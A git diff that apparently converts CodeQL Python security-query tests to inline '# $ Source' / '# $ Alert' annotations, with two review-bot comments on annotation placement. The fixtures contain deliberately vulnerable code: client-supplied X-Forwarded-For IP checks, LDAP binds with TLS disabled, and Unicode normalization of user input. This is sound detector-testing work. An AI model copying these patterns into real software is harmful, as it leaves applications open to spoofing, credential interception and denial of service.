@@ -1,3 +1,7 @@ +#select +| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | +| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | +| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | edges | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | provenance | | | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | provenance | |
@@ -16,7 +20,3 @@ nodes | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | semmle.label | ControlFlowNode for client_ip | subpaths -#select -| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | -| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | -| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input |
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref
index 2a1775fe06aa..51f11c6dfcdd 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql
\ No newline at end of file
+query: experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py
index b357a9316fd0..491a13399706 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py
@@ -10,15 +10,15 @@
 @app.route('/bad1')
 def bad1():
- client_ip = request.headers.get('x-forwarded-for')
- if not client_ip.startswith('192.168.'):
+ client_ip = request.headers.get('x-forwarded-for') # $ Source
+ if not client_ip.startswith('192.168.'): # $ Alert
 raise Exception('ip illegal')
 return 'bad1'
 @app.route('/bad2')
 def bad2():
- client_ip = request.headers.get('x-forwarded-for')
- if not client_ip == '127.0.0.1':
+ client_ip = request.headers.get('x-forwarded-for') # $ Source
+ if not client_ip == '127.0.0.1': # $ Alert
 raise Exception('ip illegal')
 return 'bad2'
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py
index 23ad29d8b09a..9899922d019b 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py
@@ -19,8 +19,8 @@ def get(self):
 if client_ip:
 client_ip = client_ip.split(',')[len(client_ip.split(',')) - 1]
 else:
- client_ip = self.request.headers.get('REMOTE_ADDR', None)
- if not client_ip == '127.0.0.1':
+ client_ip = self.request.headers.get('REMOTE_ADDR', None) # $ Source
+ if not client_ip == '127.0.0.1': # $ Alert
 raise Exception('ip illegal')
 self.write("hello.")
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected
index e217064d1dfc..58f42bec0c84 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected
@@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref
index 7b867cb31867..cd63387a1a70 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-522/LdapInsecureAuth.ql
+query: experimental/Security/CWE-522/LdapInsecureAuth.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected
index b07d47c203c5..63a573e7c088 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected
@@ -1,3 +1,10 @@ +#select +| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | edges | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | provenance | | | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | provenance | | 
@@ -27,10 +34,3 @@ nodes | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | semmle.label | ControlFlowNode for host | subpaths -#select -| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. |
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref
index 7b867cb31867..cd63387a1a70 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE-522/LdapInsecureAuth.ql
+query: experimental/Security/CWE-522/LdapInsecureAuth.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py
index 3119ca2d28a7..75f5b0b0ea34 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py
@@ -42,7 +42,7 @@ def two():
 @app.route("/one_bad")
 def one_bad():
- ldap_connection_7 = ldap.initialize(schema + remote_host)
+ ldap_connection_7 = ldap.initialize(schema + remote_host) # $ Alert
 ldap_connection_7.set_option(ldap.OPT_X_TLS_DEMAND, False)
 ldap_connection_7.simple_bind_s('', '')
 user = ldap_connection_7.search_s(
@@ -53,7 +53,7 @@ def one_bad():
 @app.route("/one_bad_2")
 def one_bad_2():
- ldap_connection_8 = ldap.initialize(schema + remote_host)
+ ldap_connection_8 = ldap.initialize(schema + remote_host) # $ Alert
 ldap_connection_8.set_option(ldap.OPT_X_TLS_NEVER, True)
 ldap_connection_8.simple_bind_s('', '')
 user = ldap_connection_8.search_s(
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py
index 269e03e41fef..ff5c5998ec23 100644
--- a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py
+++ b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py
@@ -1,5 +1,5 @@
 from ldap3 import Server, Connection, ALL
-from flask import request, Flask
+from flask import request, Flask # $ Source
 app = Flask(__name__)
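Review bot: The `# $ Source` added to `from flask import request, Flask` is the only source annotation for the alert in `eleven()` (hunk at line 136), and nothing near `host = schema + request.args['host']` points back to it. The expected rows for this file appear to place that source at the import (`ldap3_remote.py:2:19:2:25`, `ImportMember`), so the pairing is right, but a reader scanning `eleven()` sees an `# $ Alert` with no nearby `Source` and may take it for a missing annotation. A comment line above the import, such as `# Source for the alert in eleven(): the query reports the flask request import`, would record this without touching the annotated line.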
@@ -98,8 +98,8 @@ def seven(): @app.route("/eight") def eight(): - host = schema + "somethingon.theinternet.com" - srv = Server(host, port=1337) + host = schema + "somethingon.theinternet.com" # $ Source + srv = Server(host, port=1337) # $ Alert conn = Connection(srv, "dn", "password") conn.start_tls() conn.search("dn", "search_filter") @@ -111,8 +111,8 @@ def eight(): @app.route("/nine") def nine(): - host = schema + "somethingon.theinternet.com" - srv = Server(host, 1337, False) + host = schema + "somethingon.theinternet.com" # $ Source + srv = Server(host, 1337, False) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response @@ -123,8 +123,8 @@ def nine(): @app.route("/ten") def ten(): - host = schema + remote_host - srv = Server(host, port=1337, use_ssl=False) + host = schema + remote_host # $ Source + srv = Server(host, port=1337, use_ssl=False) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response @@ -136,7 +136,7 @@ def ten(): @app.route("/eleven") def eleven(): host = schema + request.args['host'] - srv = Server(host, port=1337) + srv = Server(host, port=1337) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response diff --git a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref index a0b30e6d69b8..f9b2ebd03909 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-611/SimpleXmlRpcServer.ql +query: experimental/Security/CWE-611/SimpleXmlRpcServer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
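Review bot: In `eight`, the new `# $ Alert` on `srv = Server(host, port=1337)` pins a finding on a connection that goes on to call `conn.start_tls()` before `conn.search(...)`, and nothing in the hunk says whether that finding is wanted. If the query is meant to accept a StartTLS upgrade as secure, this looks like a false positive and the annotation would read `srv = Server(host, port=1337)  # $ SPURIOUS: Alert`. If the alert is intended, a one-line comment above the `Server(...)` call should state why the StartTLS call does not clear it. The `# $ Source` / `# $ Alert` pairs in `nine` and `ten` show no such upgrade call and read as expected. The body of `eight` continues past the end of the hunk.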
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py index 83c18b549b3d..f2463a752bcb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py @@ -4,7 +4,7 @@ def foo(n: str): print("foo called with arg:", n, type(n)) return "ok" -server = SimpleXMLRPCServer(("127.0.0.1", 8000)) +server = SimpleXMLRPCServer(("127.0.0.1", 8000)) # $ Alert server.register_function(foo, "foo") server.serve_forever() diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected index 430e7558fdc6..0ef7b8b43b79 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected 
@@ -1,3 +1,10 @@ +#select +| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | +| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. 
| tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | edges | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:1:35:1:41 | ControlFlowNode for request | provenance | | | tests.py:1:35:1:41 | ControlFlowNode for request | tests.py:12:17:12:23 | ControlFlowNode for request | provenance | | 
@@ -64,10 +71,3 @@ nodes | tests.py:72:9:72:33 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tests.py:76:43:76:43 | ControlFlowNode for r | semmle.label | ControlFlowNode for r | subpaths -#select -| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | -| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. 
| tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref index aff380880ea0..1124c1683447 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-770/UnicodeDoS.ql \ No newline at end of file +query: experimental/Security/CWE-770/UnicodeDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py b/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py index 1007bcc89858..f359cdaca1c9 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/tests.py @@ -1,4 +1,4 @@ -from flask import Flask, jsonify, request +from flask import Flask, jsonify, request # $ Source import unicodedata app = Flask(__name__) @@ -13,7 +13,7 @@ def bad_1(): # Normalize the file path using NFKC Unicode normalization return ( - unicodedata.normalize("NFKC", file_path), + unicodedata.normalize("NFKC", file_path), # $ Alert 200, {"Content-Type": "application/octet-stream"}, ) 
@@ -25,7 +25,7 @@ def bad_2(): if len(r) >= 10: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -37,7 +37,7 @@ def bad_3(): length = len(r) if length >= 1_000: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -49,7 +49,7 @@ def bad_4(): length = len(r) if 1_000 <= length: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -61,7 +61,7 @@ def bad_5(): length = len(r) if not length < 1_000: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 @@ -73,7 +73,7 @@ def bad_6(): length = len(r) if not 1_000 > length: # Normalize the r using NFKD Unicode normalization - r = unicodedata.normalize("NFKD", r) + r = unicodedata.normalize("NFKD", r) # $ Alert return r, 200, {"Content-Type": "application/octet-stream"} else: return jsonify({"error": "File not found"}), 404 diff --git a/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref b/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref index 961494fbda1e..7b04068222b4 100644 --- a/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref +++ b/python/ql/test/extractor-tests/overlay/basic-overlay-eval/test.qlref 
@@ -1 +1 @@
-../basic-full-eval/test.ql
+query: ../basic-full-eval/test.ql
diff --git a/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref b/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref
index 58bedc4c88cf..e555b1a31260 100644
--- a/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref
+++ b/python/ql/test/library-tests/dataflow/coverage-py2/argumentRoutingTest.qlref
@@ -1 +1 @@
-../coverage/argumentRoutingTest.ql
+query: ../coverage/argumentRoutingTest.ql
diff --git a/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref b/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref
index 58bedc4c88cf..e555b1a31260 100644
--- a/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref
+++ b/python/ql/test/library-tests/dataflow/coverage-py3/argumentRoutingTest.qlref
@@ -1 +1 @@
-../coverage/argumentRoutingTest.ql
+query: ../coverage/argumentRoutingTest.ql
diff --git a/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref b/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref
index 2c005903470f..30e4cf2cc46a 100644
--- a/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref
+++ b/python/ql/test/library-tests/dataflow/typetracking_imports/tracked.qlref
@@ -1 +1 @@
-../typetracking/tracked.ql
+query: ../typetracking/tracked.ql
diff --git a/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref b/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref
index e0efe1024162..52f5dddc6c6d 100644
--- a/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref
+++ b/python/ql/test/library-tests/frameworks/django-orm/ReflectedXss.qlref
@@ -1 +1 @@
-Security/CWE-079/ReflectedXss.ql
+query: Security/CWE-079/ReflectedXss.ql
diff --git a/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref b/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref
index d43482cc509e..ee6206aa2325 100644
--- a/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref
+++ b/python/ql/test/library-tests/frameworks/gradio/taint_step_test.qlref
@@ -1 +1 @@
-Security/CWE-022/PathInjection.ql
+query: Security/CWE-022/PathInjection.ql
diff --git a/python/ql/test/modelling/FrameworkModeEndpoints.qlref b/python/ql/test/modelling/FrameworkModeEndpoints.qlref
index 5ae87455edd6..ec216021687b 100644
--- a/python/ql/test/modelling/FrameworkModeEndpoints.qlref
+++ b/python/ql/test/modelling/FrameworkModeEndpoints.qlref
@@ -1 +1 @@
-utils/modeleditor/FrameworkModeEndpoints.ql
\ No newline at end of file
+query: utils/modeleditor/FrameworkModeEndpoints.ql
diff --git a/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref b/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref
index 408766dcbf4d..e093d3ebd685 100644
--- a/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref
+++ b/python/ql/test/query-tests/Classes/Arguments/WrongNameForArgumentInClassInstantiation.qlref
@@ -1 +1,2 @@
-Classes/WrongNameForArgumentInClassInstantiation.ql
\ No newline at end of file
+query: Classes/WrongNameForArgumentInClassInstantiation.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref b/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref
index 4fdda20e1636..cbf14318e592 100644
--- a/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref
+++ b/python/ql/test/query-tests/Classes/Arguments/WrongNumberArgumentsInClassInstantiation.qlref
@@ -1 +1,2 @@ -Classes/WrongNumberArgumentsInClassInstantiation.ql \ No newline at end of file +query: Classes/WrongNumberArgumentsInClassInstantiation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py b/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py index 7363fdebef4e..5c03d0b08496 100644 --- a/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py +++ b/python/ql/test/query-tests/Classes/Arguments/wrong_arguments.py @@ -34,22 +34,22 @@ def __init__(self, x, y, z): # Too few arguments -F0() -F1() -F2() -F3() -F4() -F5() -F6(1) -F7(1,2) +F0() # $ Alert[py/call/wrong-number-class-arguments] +F1() # $ Alert[py/call/wrong-number-class-arguments] +F2() # $ Alert[py/call/wrong-number-class-arguments] +F3() # $ Alert[py/call/wrong-number-class-arguments] +F4() # $ Alert[py/call/wrong-number-class-arguments] +F5() # $ Alert[py/call/wrong-number-class-arguments] +F6(1) # $ Alert[py/call/wrong-number-class-arguments] +F7(1,2) # $ Alert[py/call/wrong-number-class-arguments] #Too many arguments -F0(1,2) -F1(1,2,3) -F5(1,2,3) -F6(1,2,3) -F6(1,2,3,4) +F0(1,2) # $ Alert[py/call/wrong-number-class-arguments] +F1(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F5(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F6(1,2,3) # $ Alert[py/call/wrong-number-class-arguments] +F6(1,2,3,4) # $ Alert[py/call/wrong-number-class-arguments] #OK @@ -62,9 +62,9 @@ def __init__(self, x, y, z): #Illegal name -F0(y=1) -F1(z=1) -F2(x=0, y=1) +F0(y=1) # $ Alert[py/call/wrong-named-class-argument] +F1(z=1) # $ Alert[py/call/wrong-named-class-argument] +F2(x=0, y=1) # $ Alert[py/call/wrong-named-class-argument] #Ok name 
